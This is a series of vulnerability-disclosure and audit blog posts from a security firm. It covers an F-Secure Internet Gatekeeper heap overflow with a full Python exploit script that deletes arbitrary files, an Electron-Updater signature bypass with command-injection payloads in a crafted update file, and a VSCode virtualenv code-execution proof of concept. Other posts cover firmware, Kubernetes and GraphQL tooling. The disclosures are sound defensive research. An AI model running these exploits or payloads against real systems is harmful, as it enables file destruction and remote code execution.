After running the test through gdb we discovered that the code responsible for the crash lies in the fs_httpd_civetweb_callback_begin_request function. This method is responsible for handling incoming connections and dispatching them to the relevant functions depending on which HTTP verbs, paths or cookies are used.

To demonstrate the issue we’re going to send a POST request to port 9012 where the admin panel is running. We set a very big Content-Length header value.

POST /submit HTTP/1.1
Host: 192.168.0.24:9012
Content-Length: 21487483844

AAAAAAAAAAAAAAAAAAAAAAAAAAA

The application parses the request and executes the fs_httpd_get_header function to retrieve the content length. The content length is then passed to the strtoul (String To Unsigned Long) function.

The following pseudo code provides a summary of the control flow:

content_len = fs_httpd_get_header(header_struct, "Content-Length");
if ( content_len ){
   content_len_new = strtoul(content_len, 0, 10);
}

What exactly happens in the strtoul function can be understood by reading the corresponding man pages. The return value of strtoul is an unsigned long int, which has a maximum value of 2^32-1 on 32-bit systems.

The strtoul() function returns either the result of the conversion or, if there was a leading minus sign, the negation of the result of the conversion represented as an unsigned value, unless the original (nonnegated) value would overflow; in the latter case, strtoul() returns ULONG_MAX and sets errno to ERANGE. Precisely the same holds for strtoull() (with ULLONG_MAX instead of ULONG_MAX).

As our provided Content-Length is too large for an unsigned long int, strtoul returns ULONG_MAX, which corresponds to 0xFFFFFFFF on 32-bit systems.

So far so good. Now comes the actual bug. When the fs_httpd_civetweb_callback_begin_request function tries to issue a malloc request to make room for our data, it first adds 1 to the content_len_new variable and then calls malloc.

This can be seen in the following pseudo code:

// fs_malloc == malloc
data_by_post_on_heap = fs_malloc(content_len_new + 1)

This causes a problem as the value 0xFFFFFFFF + 1 will cause an integer overflow, which results in 0x00000000. So the malloc call will allocate 0 bytes of memory.
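The wraparound is easy to reproduce outside of the target. A minimal sketch of the arithmetic (illustrative Python, not the actual Gatekeeper code):

ULONG_MAX = 0xFFFFFFFF                            # strtoul() saturates here
content_len_new = ULONG_MAX                       # Content-Length: 21487483844
alloc_size = (content_len_new + 1) & 0xFFFFFFFF   # 32-bit addition wraps around
print(hex(alloc_size))                            # 0x0 -> malloc(0)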

malloc does allow invocations with a size argument of 0. When malloc(0) is called, a valid pointer to the heap is returned, pointing to an allocation with the minimum possible chunk size of 0x10 bytes. The specifics can also be read in the man pages:

The malloc() function allocates size bytes and returns a pointer to the allocated memory. The memory is not initialized. If size is 0, then malloc() returns either NULL, or a unique pointer value that can later be successfully passed to free().

If we go a bit further down in the Internet Gatekeeper code, we can see a call to mg_read.

// content_len_new is without the addition of 0x1.
// so content_len_new == 0xFFFFFFFF
if(content_len_new){
    int bytes_read = mg_read(header_struct, data_by_post_on_heap, content_len_new)
}

During the overflow, this code reads an arbitrary amount of data onto the heap, without any restraint. For exploitation, this is a great primitive: we can stop writing bytes to the HTTP stream and the software will simply close the connection and continue. Under these circumstances, we have complete control over how many bytes we want to write.

In summary, we can leverage malloc’s 0x10-byte chunks together with an overflow of arbitrary data to overwrite existing memory structures. The following proof of concept demonstrates that. Despite being very raw, it exploits an existing struct on the heap by flipping a flag to should_delete_file = true, and then spraying the heap with the full path of the file we want to delete. Internet Gatekeeper’s internal handler has a deconstruct_http method which looks for this flag and removes the file. By leveraging this exploit, an attacker gains arbitrary file removal, which is sufficient to demonstrate the severity of the issue.

from pwn import *
import time
import sys



def send_payload(payload, content_len=21487483844, nofun=False):
    r = remote(sys.argv[1], 9012)
    r.send("POST / HTTP/1.1\n")
    r.send("Host: 192.168.0.122:9012\n")
    r.send("Content-Length: {}\n".format(content_len))
    r.send("\n")
    r.send(payload)
    if not nofun:
        r.send("\n\n")
    return r


def trigger_exploit():
    print "Triggering exploit"
    payload = ""
    payload += "A" * 12             # Padding
    payload += p32(0x1d)            # Fast bin chunk overwrite
    payload += "A"* 488             # Padding
    payload += p32(0xdda00771)      # Address of payload
    payload += p32(0xdda00771+4)    # Junk
    r = send_payload(payload)



def massage_heap(filename):
    print "Trying to massage the heap....."
    for x in xrange(100):
        payload = ""
        payload += p32(0x0)             # Needed to bypass checks
        payload += p32(0x0)             # Needed to bypass checks
        payload += p32(0xdda0077d)      # Points to where the filename will be in memory
        payload += filename + "\x00"
        payload += "C"*(0x300-len(payload))
        r = send_payload(payload, content_len=0x80000, nofun=True)
        r.close()
    print "Heap massage done"


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
        print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
        exit()
    massage_heap(sys.argv[2])
    time.sleep(1)
    trigger_exploit()
    print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])

Current exploit reliability is around 60-70% of the total attempts, and our PoC relies on the specific environment listed in the prerequisites.

Gaining RCE should definitely be possible as we can control the exact chunk size and overwrite as much data as we’d like on small chunks. Furthermore, the application uses multiple threads which can be leveraged to get into clean heap arenas and attempt exploitation multiple times. If you’re interested in working with us, email your RCE PoC to [email protected] ;)

This critical issue was tracked as FSC-2019-3 and fixed in F-Secure Internet Gatekeeper versions 5.40 – 5.50 hotfix 8 (2019-07-11). We would like to thank F-Secure for their cooperation.

Resources for learning about heap exploitation

Exploit walkthroughs

GLibC walkthroughs

Tools

  • GEF - Add-on for GDB to assist exploitation. Also, it has some useful commands for heap exploits debugging
  • Villoc - Visual representation of the heap in HTML

Security Analysis of the Solo Firmware

This blogpost summarizes the results of a cooperation between SoloKeys and Doyensec, and was originally published on the SoloKeys blog by Emanuele Cesena. You can download the full security auditing report here.

SoloKeys firmware snippet

We engaged Doyensec to perform a security assessment of our firmware, v3.0.1 at the time of testing. During a 10 person-day project, Doyensec discovered and reported 3 vulnerabilities in our firmware. While two of the issues are considered informational, one issue has been rated as high severity and was fixed in v3.1.0. The full report is available with all the details, while in this post we’d like to give a high-level summary of the engagement and findings.

Why a Security Analysis, Why Now?

One of the first requests we received after Solo’s Kickstarter was to run an independent security audit. At the time we didn’t have the resources to run it, and towards the end of 2019 I even closed the ticket as won’t fix, causing a series of complaints from the community.

Recently, we shared that we’re building a new model of Solo based on a new microcontroller, the NXP LPC55S69, and a new firmware rewritten in Rust (a blog post on the firmware is coming soon). As most of our energies will be spent on the new firmware, we didn’t want the current STM32-based firmware to be abandoned. We’ll keep supporting it, fixing bugs and vulnerabilities, but it’s likely it will receive less attention from the wider community.

Therefore we thought this was a good time for a security analysis.

We asked Doyensec to detail not just their findings but also their process, so that we can re-validate the new firmware in Rust when released. We expect to run another analysis on the new firmware, although there’s no concrete plan yet.

The Major Finding: Downgrade Attack

The security review consisted of a manual source code review and fuzzing of the firmware. One researcher performed the review for 2 weeks from Jan 21 to Jan 31, 2020.

In short, he found a downgrade attack where he was able to “upgrade” a firmware to a previous version, exploiting the ability to upload the firmware in multiple, unordered chunks. Downgrade attacks are generally very sensitive because they allow an attacker to downgrade to a previous version of the firmware and then take advantage of older known vulnerabilities.

Practically speaking, however, running such an attack against a Solo key requires either physical access to the key or (if attempted on a malicious site) an explicit user acknowledgement on the WebAuthn window.

This means that your key is almost certainly safe. In addition, we always recommend upgrading the firmware with our official tools.

Also note that our firmware is digitally signed and this downgrade attack couldn’t bypass our signature verification. Therefore a possible attacker can only install one of our twenty-ish previous releases.

Needless to say, we took the vulnerability very seriously and fixed it immediately.

Anatomy of the Downgrade Attack

This was the incriminating code, and this is the patch, which should help in understanding what happened.

Solo firmware updates are a binary blob where the last 4 bytes represent the version. When a new firmware is installed on the keys, these bytes are checked to ensure that its version is greater than the currently installed one. The firmware digital signature is also verified, but this is irrelevant here, as this attack only allows installing older signed releases.

The new firmware is written to the keys in chunks. At every write, a pointer to the last written address is updated, so that eventually it will point to the new version at the end of the firmware. You might see the issue: we were assuming that chunks are written only once and in order, but this was not enforced. The patch fixes the issue by requiring that the chunks are written strictly in ascending order.

As an example, think of running v3.0.1, and take an old firmware, say v3.0.0. Search for four bytes in it which, when interpreted as a version number, appear to be greater than v3.0.1. First, send the whole v3.0.0 firmware to the key. The last_written_app_address pointer now correctly points to the end of the firmware, encoding version 3.0.0.

Firmware downgrade step 1

Then, write the four chosen bytes again at their original location. Now last_written_app_address points somewhere in the middle of the firmware, and those 4 bytes are interpreted as a “random” version. It turns out firmware v3.0.0 contains some bytes which can be interpreted as v3.0.37 – boom! Here is a fully working proof-of-concept.

Firmware downgrade step 1
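The flawed bookkeeping can be sketched in a few lines of Python (names are modeled on the patch; the real code is C running on the device):

flash = bytearray(64 * 1024)               # stand-in for the application flash
last_written_app_address = 0

def write_chunk(offset, data):
    global last_written_app_address
    flash[offset:offset + len(data)] = data
    # BUG: blindly trusts the latest write; ascending order is not enforced
    last_written_app_address = offset + len(data)

def reported_version():
    # the 4 bytes preceding the last written address are read as the version
    return flash[last_written_app_address - 4:last_written_app_address]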

Fuzzing TinyCBOR with AFL

The researcher also integrated AFL (American Fuzzy Lop) and started fuzzing our firmware. Our firmware depends on an external library, tinycbor, for parsing CBOR data. In about 24 hours of execution, the researcher exercised the code with over 100M inputs and found over 4k bogus inputs that are misinterpreted by tinycbor and cause a crash of our firmware. Interestingly, the initial inputs were generated by our FIDO2 testing framework.

The fuzzer will be integrated in our testing toolchain soon. If anyone in the community is interested in fuzzing and would like to contribute by fixing bugs in tinycbor we would be happy to share details and examples.

Summary

In summary, we engaged a security engineering company (Doyensec) to perform a security review of our firmware. You can read the full report for details on the process and the downgrade attack they found. For any additional question or for helping with fuzzing of tinycbor feel free to reach out on Twitter @SoloKeysSec or at [email protected].

We would like to thank Doyensec for their help in securing the SoloKeys platform. Please make sure to check their website, and oh, they’re also launching a game soon. Yes, a mobile game with a hacking theme!

Signature Validation Bypass Leading to RCE In Electron-Updater

We’ve been made aware that the vulnerability discussed in this blog post has been independently discovered and disclosed to the public by a well-known security researcher. Since the security issue is now public and it is over 90 days from our initial disclosure to the maintainer, we have decided to publish the details - even though the fix available in the latest version of Electron-Builder does not fully mitigate the security flaw.

Electron-Builder advertises itself as a “complete solution to package and build a ready for distribution Electron app with auto update support out of the box”. For macOS and Windows, code signing and verification are also supported. At the time of writing, the package counts around 100k weekly downloads, and it is being used by ~36k projects with over 8k stargazers.

Electron-Builder repository

This software is commonly used to build platform-specific packages for ElectronJs-based applications and it is frequently employed for software updates as well. The auto-update feature is provided by its electron-updater submodule, internally using Squirrel.Mac for macOS, NSIS for Windows and AppImage for Linux. In particular, it features a dual code-signing method for Windows (supporting SHA1 & SHA256 hashing algorithms).

A Fail Open Design

As part of a security engagement for one of our customers, we have reviewed the update mechanism performed by Electron Builder, and discovered an overall lack of secure coding practices. In particular, we identified a vulnerability that can be leveraged to bypass the signature verification check hence leading to remote command execution.

The signature verification check performed by electron-updater is simply based on a string comparison between the installed binary’s publisherName and the Common Name attribute of the update binary’s certificate. During a software update, the application will request a file named latest.yml from the update server, which contains the definition of the new release - including the binary filename and hashes.

To retrieve the update binary’s publisher, the module executes the following code leveraging the native Get-AuthenticodeSignature cmdlet from Microsoft.PowerShell.Security:

    execFile("powershell.exe", ["-NoProfile", "-NonInteractive", "-InputFormat", "None", "-Command", `Get-AuthenticodeSignature '${tempUpdateFile}' | ConvertTo-Json -Compress`], {
      timeout: 20 * 1000
    }, (error, stdout, stderr) => {
      try {
        if (error != null || stderr) {
          handleError(logger, error, stderr)
          resolve(null)
          return
        }

        const data = parseOut(stdout)
        if (data.Status === 0) {
          const name = parseDn(data.SignerCertificate.Subject).get("CN")!
          if (publisherNames.includes(name)) {
            resolve(null)
            return
          }
        }

        const result = `publisherNames: ${publisherNames.join(" | ")}, raw info: ` + JSON.stringify(data, (name, value) => name === "RawData" ? undefined : value, 2)
        logger.warn(`Sign verification failed, installer signed with incorrect certificate: ${result}`)
        resolve(result)
      }
      catch (e) {
        logger.warn(`Cannot execute Get-AuthenticodeSignature: ${error}. Ignoring signature validation due to unknown error.`)
        resolve(null)
        return
      }
    })

which translates to the following PowerShell command:

powershell.exe -NoProfile -NonInteractive -InputFormat None -Command "Get-AuthenticodeSignature 'C:\Users\<USER>\AppData\Roaming\<vulnerable app name>\__update__\<update name>.exe' | ConvertTo-Json -Compress"

Since the ${tempUpdateFile} variable is provided unescaped to the execFile utility, an attacker could bypass the entire signature verification by triggering a parse error in the script. This can be easily achieved by using a filename containing a single quote and then by recalculating the file hash to match the attacker-provided binary (using shasum -a 512 maliciousupdate.exe | cut -d " " -f1 | xxd -r -p | base64).
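The same digest can also be computed without the shell pipeline; a quick Python equivalent (sketch):

import base64, hashlib, sys

# equivalent of: shasum -a 512 file | cut -d " " -f1 | xxd -r -p | base64
with open(sys.argv[1], "rb") as f:
    digest = hashlib.sha512(f.read()).digest()
print(base64.b64encode(digest).decode())   # value for the sha512 field of latest.yml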

For instance, a malicious update definition would look like:

version: 1.2.3
files:
  - url: v'ulnerable-app-setup-1.2.3.exe
    sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
    size: 44653912
path: v'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

When serving a similar latest.yml to a vulnerable Electron app, the attacker-chosen setup executable will be run without warnings. Alternatively, an attacker may leverage the lack of escaping to pull off a trivial command injection:

version: 1.2.3
files:
  - url: v';calc;'ulnerable-app-setup-1.2.3.exe
    sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
    size: 44653912
path: v';calc;'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

From an attacker’s standpoint, it would be more practical to backdoor the installer and then leverage preexisting electron-updater features like isAdminRightsRequired to run the installer with Administrator privileges.

PoC Reproduction of the command injection by using Burp's interception feature

Impact

An attacker could leverage this fail open design to force a malicious update on Windows clients, effectively gaining code execution and persistence capabilities. This could be achieved in several scenarios, such as a service compromise of the update server, or an advanced MITM attack leveraging the lack of certificate validation/pinning against the update server.

Disclosure Timelines

Doyensec contacted the main project maintainer on November 12th, 2019 providing a full description of the vulnerability together with a Proof-of-Concept. After multiple solicitations, on January 7th, 2020 Doyensec received a reply acknowledging the bug but downplaying the risk.

At the same time (November 12th, 2019), we identified and reported this issue to a number of affected popular applications using the vulnerable electron-builder update mechanism on Windows, including:

On February 15th, 2020, we were made aware that the vulnerability discussed in this blog post was being publicly discussed on Twitter. On February 24th, 2020, we were informed by the package’s maintainer that the issue was resolved in release v22.3.5. While the patch mitigates the potential command injection, the fail-open condition is still in place and we believe that other attack vectors exist. After informing all affected parties, we have decided to publish our technical blog post to emphasize the risk of using Electron-Builder for software updates.

Mitigations

Despite its popularity, we would suggest moving away from Electron-Builder due to the lack of secure coding practices and responsiveness of the maintainer.

Electron Forge represents a well-maintained potential substitute, which takes advantage of the built-in Squirrel framework and Electron’s autoUpdater module. Since Squirrel.Windows doesn’t implement signature validation either, for a robust signature validation on Windows consider shipping the app through the Windows Store or incorporating minisign into the update workflow.

Please note that using Electron-Builder to prepare platform-specific binaries does not make the application vulnerable to this issue as the vulnerability affects the electron-updater submodule only. Updates for Linux and Mac packages are also not affected.

If migrating to a different software update mechanism is not feasible, make sure to upgrade Electron-Builder to the latest version available. At the time of writing, we believe that other attack payloads for the same vulnerable code path still exist in Electron-Builder.

Standard security hardening and monitoring on the update server are also important, as full access to such a system is required in order to exploit the vulnerability. Finally, enforcing TLS certificate validation and pinning for connections to the update server mitigates the MITM attack scenario.

Credits

This issue was discovered and studied by Luca Carettoni and Lorenzo Stella. We would like to thank Samuel Attard of the ElectronJS Security WG for the review of this blog post.

2019 Gravitational Security Audit Results

This is a re-post of the original blogpost published by Gravitational on the 2019 security audit results for their two products: Teleport and Gravity.

You can download the security testing deliverables for Teleport and Gravity from our research page.

We would like to take this opportunity to thank the Gravitational engineering team for choosing Doyensec and working with us to ensure a successful project execution.

We now live in an era where the security of all layers of the software stack is immensely important, and simply open sourcing a code base is not enough to ensure that security vulnerabilities surface and are addressed. At Gravitational, we see it as a necessity to engage a third party that specializes in acting as an adversary, and to provide an independent analysis of our sources.

2019 Gravitational Security Audit Results

This year, we had an opportunity to work with Doyensec, which provided the most thorough independent analysis of Gravity and Teleport to date. The Doyensec team did an amazing job at finding areas where we are weak in the Gravity code base. Here are the full reports for Teleport and Gravity; you can find all of our security audits here.

Gravity

Gravity has a lot of moving components. As a Kubernetes distribution and distributed system for delivering Kubernetes in many unique environments, the product’s attack surface isn’t small.

All flaws considered medium or higher, except for one, were patched and released as they were reported by the Doyensec team, and we’ve also been working towards addressing the more minor and informational issues as part of our normal release process. Out of the four vulnerabilities rated as high by Doyensec, we’ve managed to patch three of them; the fourth requires a significant investment in design and tooling changes, which we’ll go into in a moment.

Insecure Decompression of Application Bundles

Part of what Gravity does is package applications into an installer that can be taken to on-prem and air-gapped environments, installing a fully working Kubernetes cluster and application without dependencies. As such, we build our artifacts as a tar file - a virtually universally supported archive format.

Along with this, our own tooling is able to process and accept these tar archives, which is where we ran into problems. Golang’s tar handling code is extremely basic, and this allows very old tar handling problems to resurface, granting specially crafted tar files the ability to overwrite arbitrary system files and allowing for remote code execution. Our tar handling has now been hardened against such vulnerabilities, and we’ll write a post digging into just this topic soon.
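As an illustration of the bug class, the classic “tar slip”, a hardened extraction routine must reject entries that resolve outside the destination directory (a sketch in Python for brevity; Gravity itself is written in Go):

import os, tarfile

def safe_extract(tar: tarfile.TarFile, dest: str) -> None:
    dest = os.path.realpath(dest)
    for member in tar.getmembers():
        target = os.path.realpath(os.path.join(dest, member.name))
        # reject absolute paths and ../ traversal before extracting anything
        if not target.startswith(dest + os.sep):
            raise ValueError("blocked path traversal entry: " + member.name)
    tar.extractall(dest)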

Remote Code Execution via Malicious Auth Connector

When using our CLI tools to do single sign-on, we launch a browser to take the user to the single sign-on page. This was done by passing a URL from the server to the client to tell it where the SSO page is located.

Someone with access to the server could change the URL to a non-http(s) URL and execute programs locally on the CLI host. We’ve implemented sanitization of the URL passed by the server to enforce http(s), and also changed the design of some new features to avoid trusting data from a server.

Missing ACLs in the API

Perhaps the most embarrassing issue in this list - the API endpoints responsible for managing API tokens were missing authorization ACLs. This allowed for any authenticated user, even those with empty permissions, to access, edit, and create tokens for other users. This would allow for user impersonation and privilege escalation. This vulnerability was quickly addressed by implementing the correct ACLs, and the team is working hard to ensure these types of vulnerabilities do not reoccur.

Missing Signature Verification in Application Bundles

This is the vulnerability we haven’t been able to address so far, as protecting against it was never a design objective.

Gravity includes a hub product for enterprise customers that allows for the storage and download of application assets, either for installation or upgrade. In essence, part of the hub product is to act as a file server where a company can store their application, and internally or publicly connect deployed clusters for updates.

The weakness in the model, as has been seen by many public artifact repositories, is that this security model relies on the integrity of the system storing those assets.

While not necessarily a vulnerability on its own, this is a design weakness that doesn’t match the capabilities the security community expects. The security is roughly equivalent to posting a binary build to Github - anyone with the correct access can modify or post malicious assets, and anyone who trusts Github when downloading that asset could be getting a malicious asset. Instead, packages should be signed in some way before being posted to a public download server, and the software should have a method for trusting that updates and installs come from a trusted source.

This is a really difficult problem that many companies have gotten wrong, so it’s not something that Gravitational as an organization is willing to rush a solution for. There are several well known models that we are evaluating, but we’re not at a stage where we have a solution that we’re completely happy with.

In this realm, we’re also going to end-of-life the hub product, as the asset storage functionality is not widely used. We’re also going to move the remote access functionality that our customers do care about over to our Teleport product.

Teleport

As we mentioned in the Teleport 4.2 release notes, the most serious issues were centered around the incorrect handling of session data. If an attacker was able to gain valid x509 credentials of a Teleport node, they could use the session recording facility to read/write arbitrary files on the Auth Server or potentially corrupt recorded session data.

These vulnerabilities could only be exploited using credentials from a previously authenticated client. There was no known way for non-authenticated clients to exploit this vulnerability from outside the cluster.

After the re-assessment, all issues with any direct security impact were addressed. From the report:

In January 2020, Doyensec performed a retesting of the Teleport platform and confirmed the effectiveness of the applied mitigations. All issues with direct security impact have been addressed by Gravitational.

Even though all direct issues were mitigated, there was one issue in the report that continued to bother us and that we felt we could do better on: “#6: Session Recording Bypasses”. This is something we had known about for quite some time and something we have been upfront about with users and customers. Session recording is a great feature; however, due to the inherent complexity of the problem being solved, bypasses do exist.

Teleport 4.2 introduced a new feature called Enhanced Session Recording that uses eBPF tooling to substantially reduce the bypass gaps that can exist. We’ll have more to share on that soon in the form of another blog post that will go into the technical implementation details for that feature.

Don't Clone That Repo: Visual Studio Code^2 Execution

This is the story of how I stumbled upon a code execution vulnerability in the Visual Studio Code Python extension. It currently has 16.5M+ installs reported in the extension marketplace.


The bug

Some time ago I was reviewing a client’s Python web application when I noticed a warning:

VSCode pylint not installed warning

Fair enough, I thought, I just need to install pylint.

To my surprise, after running pip install --user pylint the warning was still there. Then I noticed venv-test displayed on the lower-left of the editor window. Did VSCode just automatically select the Python environment from the project folder?! To confirm my hypothesis, I installed pylint inside that virtualenv and the warning disappeared.

VSCode pylint not installed warning full window screenshot

This seemed sketchy, so I added os.system("open /Applications/Calculator.app") to one of pylint’s sources and a calculator spawned. Easiest code execution ever!

This VSCode behavior is dangerous, since the virtualenv found in a project folder is activated without user interaction. Adding a malicious folder to the workspace and opening a Python file inside the project is sufficient to trigger the vulnerability. Once a virtualenv is found, VSCode saves its path in .vscode/settings.json. If this file is found in a cloned repo, its value is loaded and trusted without asking the user. In practice, it is possible to hide the virtualenv in any repository.

The behavior is not in the VSCode core, but rather in the Python extension. We contacted Microsoft on October 2nd, 2019; however, the vulnerability is still not patched at the time of writing. Given that the industry-standard 90 days have expired and the issue is exposed in a GitHub issue, we have decided to disclose the vulnerability.

PoC || GTFO

You can try for yourself! This innocuous PoC repo opens Calculator.app on macOS:

  1. git clone git@github.com:doyensec/VSCode_PoC_Oct2019.git
  2. Add the cloned repo to the VSCode workspace
  3. Open test.py in VSCode

This repo contains a “malicious” settings.json which selects the virtualenv in totally_innocuous_folder/no_seriously_nothing_to_see_here.
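The offending file is tiny. A sketch of what it can look like follows; python.pythonPath was the workspace-level setting honored by the Python extension at the time:

{
    "python.pythonPath": "totally_innocuous_folder/no_seriously_nothing_to_see_here/bin/python"
}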

In the case of a bare-bones repo like this, noticing the virtualenv might be easy, but it’s easy to see how one might miss it in a real-life codebase. Moreover, it is certainly undesirable that VSCode executes code from a folder just by opening a Python file in the editor.

Disclosure Timeline

  • 2nd Oct 2019: Issue discovered
  • 2nd Oct 2019: Security advisory sent to Microsoft
  • 8th Oct 2019: Response from Microsoft, issue opened on vscode-python bug tracker #7805
  • 7th Jan 2020: Asked Microsoft for a resolution timeframe
  • 8th Jan 2020: Microsoft replies that the issue should be fixed by mid-April 2020
  • 16th Mar 2020: Doyensec advisory and blog post is published

Edits

  • 17th Mar 2020: The blogpost stated that the extension is bundled by default with the editor. That is not the case, and we removed that claim. Thanks @justinsteven for pointing this out!

InQL Scanner

InQL is now public!

As a part of our continuing security research journey, we started developing an internal tool to speed-up GraphQL security testing efforts. We’re excited to announce that InQL is available on Github.

Doyensec Loves GraphQL

InQL can be used as a stand-alone script or as a Burp Suite extension (available for both Professional and Community editions). The tool leverages GraphQL’s built-in introspection query to dump queries, mutations, subscriptions, fields, and arguments, and to retrieve default and custom objects. This information is collected and then processed to construct API endpoint documentation in the form of HTML and JSON schemas. InQL is also able to generate query templates for all the known types. The scanner can identify basic query types and replace them with placeholders, rendering the query ready to be ingested by a remote API endpoint.

We believe this feature, combined with the ability to send query templates to Burp’s Repeater, will decrease the time to exploit vulnerabilities in GraphQL endpoints and drastically lower the bar for security research against GraphQL tech stacks.
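Under the hood, everything starts from a plain introspection request. A minimal sketch against a hypothetical endpoint (InQL automates the full query and all the post-processing):

import json, urllib.request

query = "{ __schema { types { name kind } } }"
req = urllib.request.Request(
    "https://example.com/graphql",              # hypothetical endpoint
    data=json.dumps({"query": query}).encode(),
    headers={"Content-Type": "application/json"},
)
print(json.load(urllib.request.urlopen(req))["data"]["__schema"]["types"][:5])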

InQL Scanner Burp Suite Extension

Using the inql extension for Burp Suite, you can:

  • Search for known GraphQL URL paths; the tool will grep and match known values to detect GraphQL endpoints within the target website
  • Search for exposed GraphQL development consoles (GraphiQL, GraphQL Playground, and other common utilities)
  • Use a custom GraphQL tab displayed on each HTTP request/response containing GraphQL
  • Leverage the template generation by sending those requests to Burp’s Repeater tool
  • Configure the tool by using a custom settings tab

Enabling InQL Scanner Extension in Burp

To use inql in Burp Suite, import the Python extension:

  • Download the latest Jython Jar
  • Download the latest version of InQL scanner
  • Start Burp Suite
  • Extender Tab > Options > Python Environment > Set the location of the Jython standalone JAR
  • Extender Tab > Extension > Add > Extension Type > Select Python
  • Extension File > Set the location of inql_burp.py > Next
  • The output window should display the following message: InQL Scanner Started!

In the near future, we might consider integrating the extension within Burp’s BApp Store.

InQL Demo

We completely revamped the command line interface in light of InQL’s public release. This interface retains most of the Burp plugin’s functionality.

It is now possible to install the tool with pip and run it through your favorite CLI.

pip install inql

For all supported options, check the command line help:

usage: inql [-h] [-t TARGET] [-f SCHEMA_JSON_FILE] [-k KEY] [-p PROXY]
            [--header HEADERS HEADERS] [-d] [--generate-html]
            [--generate-schema] [--generate-queries] [--insecure]
            [-o OUTPUT_DIRECTORY]

InQL Scanner

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET             Remote GraphQL Endpoint (https://<Target_IP>/graphql)
  -f SCHEMA_JSON_FILE   Schema file in JSON format
  -k KEY                API Authentication Key
  -p PROXY              IP of web proxy to go through (http://127.0.0.1:8080)
  --header HEADERS HEADERS
  -d                    Replace known GraphQL arguments types with placeholder
                        values (useful for Burp Suite)
  --generate-html       Generate HTML Documentation
  --generate-schema     Generate JSON Schema Documentation
  --generate-queries    Generate Queries
  --insecure            Accept any SSL/TLS certificate
  -o OUTPUT_DIRECTORY   Output Directory

An example query can be performed against one of the numerous exposed APIs, e.g. the anilist.co endpoint:

$ inql -t https://anilist.co/graphql
[+] Writing Queries Templates
 |  Page
 |  Media
 |  MediaTrend
 |  AiringSchedule
 |  Character
 |  Staff
 |  MediaList
 |  MediaListCollection
 |  GenreCollection
 |  MediaTagCollection
 |  User
 |  Viewer
 |  Notification
 |  Studio
 |  Review
 |  Activity
 |  ActivityReply
 |  Following
 |  Follower
 |  Thread
 |  ThreadComment
 |  Recommendation
 |  Like
 |  Markdown
 |  AniChartUser
 |  SiteStatistics
[+] Writing Queries Templates
 |  UpdateUser
 |  SaveMediaListEntry
 |  UpdateMediaListEntries
 |  DeleteMediaListEntry
 |  DeleteCustomList
 |  SaveTextActivity
 |  SaveMessageActivity
 |  SaveListActivity
 |  DeleteActivity
 |  ToggleActivitySubscription
 |  SaveActivityReply
 |  DeleteActivityReply
 |  ToggleLike
 |  ToggleLikeV2
 |  ToggleFollow
 |  ToggleFavourite
 |  UpdateFavouriteOrder
 |  SaveReview
 |  DeleteReview
 |  RateReview
 |  SaveRecommendation
 |  SaveThread
 |  DeleteThread
 |  ToggleThreadSubscription
 |  SaveThreadComment
 |  DeleteThreadComment
 |  UpdateAniChartSettings
 |  UpdateAniChartHighlights
[+] Writing Queries Templates
[+] Writing Queries Templates

The resulting HTML documentation page will contain details for all available queries, mutations, and subscriptions.

Stay tuned!

Back in May 2018, we published a blog post on GraphQL security where we focused on vulnerabilities and misconfigurations. As part of that research effort, we developed a simple script to query GraphQL endpoints. After the publication, we received a lot of positive feedback that sparked even more interest in further developing the concept. Since then, we have refined our GraphQL testing methodologies and tooling. As part of our standard customer engagements, we often perform testing against GraphQL technologies, and we expect to continue our research efforts in this space. Going forward, we will keep improving detection and make the tool more stable.

This project was made with love in the Doyensec Research island.

LibreSSL and OSS-Fuzz

The story of a fuzzing integration reward

In my first month at Doyensec I had the opportunity to bring together both my work and my spare-time hobbies. I used the 25% research time offered by Doyensec to integrate the LibreSSL library into OSS-Fuzz. LibreSSL is an API-compatible replacement for OpenSSL, and after the Heartbleed vulnerability it is considered a full-fledged replacement for OpenSSL on OpenBSD, macOS and Void Linux.

OSS-Fuzz Fuzzing Process

In the context of this research, Google awarded us a $10,000 bounty, 100% of which was donated to the Cancer Research Institute. The fuzzer also discovered 14+ new vulnerabilities, four of which were directly related to memory corruption.

In the following paragraphs we will walk through the process of porting a new project to OSS-Fuzz, from following the community-provided steps all the way to the actual code porting, and we will also show a vulnerability fixed in 136e6c997f476cc65e614e514ac3bf6ee54fc4b4.

commit 136e6c997f476cc65e614e514ac3bf6ee54fc4b4
Author: beck <>
Date:   Sat Mar 23 18:48:15 2019 +0000

    Add range checks to varios ASN1_INTEGER functions to ensure the
    sizes used remain a positive integer. Should address issue
    13799 from oss-fuzz
    ok tb@ jsing@

 src/lib/libcrypto/asn1/a_int.c    | 56 +++++++++++++++++++++++++++++++++++++++++++++++++++++---
 src/lib/libcrypto/asn1/tasn_prn.c |  8 ++++++--
 src/lib/libcrypto/bn/bn_lib.c     |  4 +++-
 3 files changed, 62 insertions(+), 6 deletions(-)

The FOSS historician blurry book

As a Void Linux maintainer, I’m a long-time LibreSSL user and proponent. LibreSSL is a version of the TLS/crypto stack forked from OpenSSL in 2014, with the goals of modernizing the codebase, improving security, and applying best-practice development procedures. The motivation for this kind of fork arose after the discovery of the Heartbleed vulnerability.

LibreSSL’s efforts are aimed at removing code considered useless for the target platforms, removing code smells and including additional secure defaults at the cost of compatibility. The LibreSSL codebase is now nearly 70% the size of OpenSSL (237558 cloc vs 335485 cloc), while implementing a similar API on all the major modern operating systems.

